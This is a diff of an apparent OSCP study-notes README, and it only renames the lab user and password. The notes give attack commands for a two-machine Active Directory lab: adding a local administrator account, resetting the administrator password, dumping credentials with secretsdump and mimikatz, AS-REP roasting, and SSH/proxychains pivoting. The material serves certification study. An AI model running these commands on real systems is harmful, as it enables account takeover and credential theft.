AbdullahZuhair21/OSCP-Notes/README.md

 ·         Found users account domain01  (if you find user then don’t use below step) ·         transfer bloodhound.zip on kali
-·         Create a new user (if you want or change administrator password) ·         net user noman Noman@321 /add
+·         Create a new user (if you want or change administrator password) ·         net user raman raman@321 /add
-·         net localgroup administrators noman /add
+·         net localgroup administrators raman /add
-·         net user administrator Noman@123 (password Changed of administrator) ·         run secret dump or use mimikatz to find user and password on machine01 ·         use impacket for secret dump https://github.com/fortra/impacket ·         python3 ./secretsdump.py ./administrator: Noman@123@192.168.10.10 (check domain users with oscp.exam specially default username and password
+·         net user administrator raman@123 (password Changed of administrator) ·         run secret dump or use mimikatz to find user and password on machine01 ·         use impacket for secret dump https://github.com/fortra/impacket ·         python3 ./secretsdump.py ./administrator: raman@123@192.168.10.10 (check domain users with oscp.exam specially default username and password
 ·         for MimiKatz   privilege::debug | token::elevate | sekurlsa::logonpasswords
 Machine02
 The first step is to start port forwarding, followed by running AS-REP Roasting with GetUserSPNs.py for Linux and Rubeus.exe for Windows.
 If neither method works, manually enumerate in Windows to find the username and password or again use mimikatz.
 If you are not an administrator, apply Windows privilege escalation techniques on it.
 This will help you gain privileges on Machine02.
 ·         run map on Macine02 with proxychains nmap -sT -sU -p22,161,135,139,445,88,3389 10.10.10.10
-Port Forward with SSH   (if port 22 is open in machine01) ·         ssh -D 8001 -C -q -N noman@192.168.10.10
+Port Forward with SSH   (if port 22 is open in machine01) ·         ssh -D 8001 -C -q -N raman@192.168.10.10
 ·         in /etc/proxychains4.conf  (add 127.0.0.1 9999)
 ·         socks5 127.0.0.1 8001
 Port Forward with chisel